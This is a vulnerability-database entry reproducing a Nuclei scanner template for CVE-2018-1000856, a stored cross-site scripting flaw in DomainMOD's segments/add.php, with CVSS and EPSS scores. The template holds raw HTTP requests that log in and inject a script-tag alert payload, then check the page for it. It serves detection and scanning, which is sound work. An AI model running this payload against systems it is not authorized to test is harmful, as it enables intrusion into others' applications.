Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-1000856
HistoryJul 11, 2022 - 7:48 p.m.

DomainMOD 4.11.01 - Cross-Site Scripting

2022-07-1119:48:52
ProjectDiscovery
github.com
1

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

4.8 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

30.3%

DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field.
id: CVE-2018-1000856

info:
  name: DomainMOD 4.11.01 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://github.com/domainmod/domainmod/issues/80
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2018-1000856
    cwe-id: CWE-79
    epss-score: 0.00069
    epss-percentile: 0.30035
    cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: domainmod
    product: domainmod
  tags: cve2018,cve,domainmod,xss,authenticated

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new_username={{username}}&new_password={{password}}
      - |
        POST /segments/add.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test
      - |
        GET /segments/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    host-redirects: true
    max-redirects: 3

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(1)</script></a>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402207d90ae1fac1b0db54f1d7a8e1f3eef2eb844417c05891f1804fb128088eb1d00022066c3f64a9240b442390e30adbf000b7b79f88529a42d94fdc60527fb2e78324a:922c64590222798bb761d5b6d8e72950

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

4.8 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

30.3%

Related for NUCLEI:CVE-2018-1000856